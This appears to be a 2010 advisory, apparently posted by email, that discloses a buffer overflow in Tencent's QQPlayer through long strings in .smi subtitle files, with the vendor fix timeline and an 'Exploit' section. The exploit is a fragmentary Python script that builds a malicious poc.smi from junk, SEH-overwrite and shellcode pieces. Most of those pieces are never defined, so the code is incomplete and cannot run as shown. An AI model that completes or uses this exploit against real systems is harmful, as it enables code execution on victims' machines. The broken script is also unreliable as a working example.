QQplayer smi File Processing Buffer Overflow Vulnerability By Lufeng Li of Neusoft Corporation Vulnerable: QQPlayer<=2.3.696.400p1 Vendor: Tencent Inc 1) Software Description: QQPlayer is developed by Tencent Inc.It is very popular universal multimedia player in China. 2) Details: A buffer overflow vulnerability in QQplayer that Processing smi file. allows remote attackers to execute arbitrary code via a long string in an smi file. 3) Timeline: 2010.05.26 Vendor notified 2010.06.8 Vendor released new fixed versions(QQplayer 2.4.716.400p1) 2010.07.26 Advisory released 4) Exploit: #!/usr/bin/env python ################################################################# # # Title: QQPlayer smi File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400p1 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code : head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.smi","w") fobj.write(payload) fobj.close() --------------------------------------------------------------------------------------------------- Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s) is intended only for the use of the intended recipient and may be confidential and/or privileged of Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying is strictly prohibited, and may be unlawful.If you have received this communication in error,please immediately notify the sender by return e-mail, and delete the original message and all copies from your system. Thank you. ---------------------------------------------------------------------------------------------------